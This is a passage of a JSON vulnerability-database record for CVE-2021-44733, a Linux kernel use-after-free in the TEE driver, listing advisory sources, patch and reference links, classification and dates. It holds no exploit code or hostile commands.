from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYnqSF9zjgjWX9erEAQjBXQ/8DSpFUMNN6ZVFtli2KuVowVLS+14J0jtj\n0zxpr0skJT8vVulU3VTeURBMdg9NAo9bj3R5KTk2+dC+AMuHET5aoVvaYmimBGKL\n5qzpu7q9Z0aaD2I288suHCnYuRJnt+qKZtNa4hlcY92bN0tcYBonxsdIS2xM6xIu\nGHNS8HNVUNz4PuCBfmbITvgX9Qx+iZQVlVccDBG5LDpVwgOtnrxHKbe5E499v/9M\noVoN+eV9ulHAZdCHWlUAahbsvEqDraCKNT0nHq/xO5dprPjAcjeKYMeaICtblRr8\nk+IouGywaN+mW4sBjnaaiuw2eAtoXq/wHisX1iUdNkroqcx9NBshWMDBJnE4sxQJ\nZOSc8B6yjJItPvUI7eD3BDgoka/mdoyXTrg+9VRrir6vfDHPrFySLDrO1O5HM5fO\n3sExCVO2VM7QMCGHJ1zXXX4szk4SV/PRsjEesvHOyR2xTKZZWMsXe1h9gYslbADd\ntW0yco/G23xjxqOtMKuM/nShBChflMy9apssldiOfdqODJMv5d4rRpt0xgmtSOM6\nqReveuQCasmNrGlAHgDwbtWz01fmSuk9eYDhZNmHA3gxhoHIV/y+wr0CLbOQtDxT\np79nhiqwUo5VMj/X30Lu0Wl3ptLuhRWamzTCkEEzdubr8aVsT4RRNQU3KfVFfpT1\nMWp/2ui3i80=\n=Fdgy\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. 8) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-44733",
        "trust": 2.4
      },
      {
        "db": "PACKETSTORM",
        "id": "166397",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166708",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "166636",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0629",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1629",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0987",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.1237",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0618",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0611",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0800",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022032316",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022031403",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2021122819",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-44733",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166400",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "166392",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167097",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167072",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "id": "VAR-202112-1696",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.6666667
  },
  "last_update_date": "2022-05-13T21:57:14.093000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=176462"
      },
      {
        "title": "Red Hat: CVE-2021-44733",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-44733"
      },
      {
        "title": "Ubuntu Security Notice: USN-5339-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5339-1"
      },
      {
        "title": "Ubuntu Security Notice: USN-5338-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5338-1"
      },
      {
        "title": "Ubuntu Security Notice: USN-5278-1: Linux kernel (OEM) vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5278-1"
      },
      {
        "title": "Ubuntu Security Notice: USN-5368-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5368-1"
      },
      {
        "title": "Ubuntu Security Notice: USN-5337-1: Linux kernel vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-5337-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-009",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-009"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1749",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2022-1749"
      },
      {
        "title": "Debian Security Advisories: DSA-5096-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=9382520336267e8dcd400d9d993e932b"
      },
      {
        "title": "Siemens Security Advisories: Siemens Security Advisory",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=ec6577109e640dac19a6ddb978afe82d"
      },
      {
        "title": "optee-qemu",
        "trust": 0.1,
        "url": "https://github.com/pjlantz/optee-qemu "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/log/drivers/tee/tee_shm.c"
      },
      {
        "trust": 1.7,
        "url": "https://lore.kernel.org/lkml/20211215092501.1861229-1-jens.wiklander@linaro.org/"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/pjlantz/optee-qemu/blob/main/readme.md"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20220114-0003/"
      },
      {
        "trust": 1.7,
        "url": "https://www.debian.org/security/2022/dsa-5096"
      },
      {
        "trust": 1.7,
        "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00012.html"
      },
      {
        "trust": 1.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-44733"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2021122819"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166397/ubuntu-security-notice-usn-5338-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0618"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0629"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1629"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022031403"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022032316"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-reuse-after-free-via-tee-shm-get-from-id-37127"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0800"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0987"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0611"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166636/ubuntu-security-notice-usn-5368-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/166708/ubuntu-security-notice-usn-5377-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.1237"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45095"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45480"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4135"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28711"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28715"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4197"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-44733"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0516"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-5339-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0742"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39685"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43975"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23222"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45402"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-39698"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0382"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-0264"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27666"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1055"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-27820"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-0404"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3743"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13974"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3759"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-26401"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1011"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3772"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-37159"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-0404"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-37159"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4002"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3772"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0322"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4002"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-41864"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3773"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4197"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4157"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4037"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4157"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13974"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3669"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.6_release_notes/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3759"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0002"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3752"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3764"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4203"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-43976"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3764"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-29154"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3743"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3744"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4083"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3773"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20322"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-0286"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20322"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4083"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41864"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26401"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-0941"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3744"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-4037"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-0941"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-42739"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3612"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3669"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-43389"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4203"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-29154"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42739"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-45485"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27820"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-45486"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3752"
      },
      {
        "trust": 0.2,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/416.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/pjlantz/optee-qemu"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1134.147"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1123.132"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1119.133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1038.43"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-173.182"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1124.133"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1090.99"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1110.113"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1018.20"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1067.72~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1059.62"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1073.76"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1069.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1067.72"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1018.20~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1069.73~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5338-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1073.76~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1037.38"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-105.119~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1066.69"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-105.119"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5337-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.13.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.13.0-37.42"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.13.0-1022.24"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.13.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.13/5.13.0-37.42~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.13/5.13.0-1019.21~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.13.0-1021.25"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1032.35"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-45469"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5377-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5368-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21781"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1988"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21781"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-4788"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-4305"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-4788"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43056"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:1975"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-43389"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-12-22T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "date": "2022-03-22T15:35:42",
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "date": "2022-03-22T15:31:06",
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "date": "2022-03-22T15:16:20",
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "date": "2022-04-13T15:02:44",
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "date": "2022-04-07T16:37:07",
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "date": "2022-05-11T16:54:36",
        "db": "PACKETSTORM",
        "id": "167097"
      },
      {
        "date": "2022-05-11T16:37:26",
        "db": "PACKETSTORM",
        "id": "167072"
      },
      {
        "date": "2021-12-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "date": "2021-12-22T17:15:00",
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-44733"
      },
      {
        "date": "2022-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      },
      {
        "date": "2022-04-01T16:44:00",
        "db": "NVD",
        "id": "CVE-2021-44733"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "166400"
      },
      {
        "db": "PACKETSTORM",
        "id": "166397"
      },
      {
        "db": "PACKETSTORM",
        "id": "166392"
      },
      {
        "db": "PACKETSTORM",
        "id": "166708"
      },
      {
        "db": "PACKETSTORM",
        "id": "166636"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux kernel Resource Management Error Vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202112-2166"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0122
Vulnerability from variot

